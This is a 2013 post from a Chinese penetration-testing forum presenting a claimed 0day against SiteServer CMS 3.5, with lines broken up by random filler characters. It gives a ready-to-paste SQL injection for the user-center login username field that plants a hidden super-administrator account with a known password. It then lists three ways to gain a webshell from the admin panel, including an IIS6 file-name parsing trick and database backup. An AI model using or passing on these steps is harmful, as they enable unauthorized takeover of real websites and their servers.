中国网络渗透测试联盟

标题: SiteServer CMS 0Day [打印本页]

作者: admin    时间: 2013-1-11 21:10
标题: SiteServer CMS 0Day
经测试秒杀最新的3.5版
+ D$ h# c' F. Y8 |1 D; K4 u/ w5 v* C8 O" V$ b' o, Q5 j
stieserver官网:www.siteserver.cn2 p* X* j$ p4 {  Y; Z" G2 C0 o
( S: w# E. c! ?: v6 J
' ?( n/ ^7 k8 Q( `) q) M# k7 h
2 w8 J) q) c7 o* l+ j
EXP:
7 h+ F5 E2 Y- C* T1 @6 D/ V: M! x( _+ X  H1 a, m2 O6 r3 \
直接访问UserCenter/login.aspx3 H! e2 J  \1 ^0 @/ t
' D) _4 B" L! p! Z! q$ U

1 L; K1 j+ O9 i
4 \( P9 u+ e! }1 i用户名处输入:4 H2 f; t/ L+ O, N) v$ ?

2 p- b0 E( U: @  T: l123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
$ Q+ C! S4 ^! n% c2 s2 L' w4 e& w2 x. J" F# T
2 i( a% }( u: N6 `$ r& @
8 Y% B9 O7 R+ X  Q; d# A
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。' j8 x, Q# L! y* z9 p6 ?1 W

3 i6 \9 a# m# V  ?  T  S   n9 ~4 N% m5 w5 @. K! h0 }
4 _  d8 y. s# @  I! o* s* L6 b
之后再访问后台SiteServer/login.aspx用插入的用户登陆
4 a3 L0 u" _4 h* R. U- c" l3 t) N( C* G; D
) G" h' O7 O% i8 s9 H

2 _# u% f7 G/ ]后台拿webshell的三种方法:& ~/ A# x, }: X) i% w+ G5 H

5 N6 o& V" C: S! V  T2 H/ d3 g一、, ^7 p& U2 M' L7 l* |

9 ~* @* o- `& B) L7 |( f* Q站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx3 I3 t5 l- k1 C
3 g) W6 Z4 Q9 s' a" Q
二、2 _$ W, \+ z0 v( B8 \
& e/ i$ B3 J) w$ f! N! t
成员权限-》添加用户-》用户名为:1.asp$ z' J8 c- D) G8 f/ P; r! }

9 h6 r5 z- U+ P, Rhttp://127.0.0.1/usercenter/- \& I3 ^5 |% Z0 h/ ?' @. O
" d" a; W/ [1 i# j
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell1 ^7 ~5 ?+ w! j& A3 I
; `" y# j' e% W$ `
(ps:后台添加用户时不会验证是否含有非法字符)0 [1 c4 }" q4 l, x5 }; p: [

$ O. Q8 s0 q$ n) ^- H1 V, |3 {三、
- d1 z$ ~% l8 f- C6 |" I
8 v2 K% v' p+ b. D& j% {9 v系统工具-》实用工具-》机器参数查看0 d% T+ ]' N. u$ d- p; W! T
可以看到数据库类型、名称,WEB路径
# t. F& Q8 t3 D  I2 y( {  m$ t4 B* f9 ], c" `6 k
系统工具-》数据库工具-》SQL语句查询0 }" c" U0 d3 s0 Q' a  m1 d
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。
. z! \2 W+ y6 {0 r' P
- k* \( S: x' I# F1 w; a




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2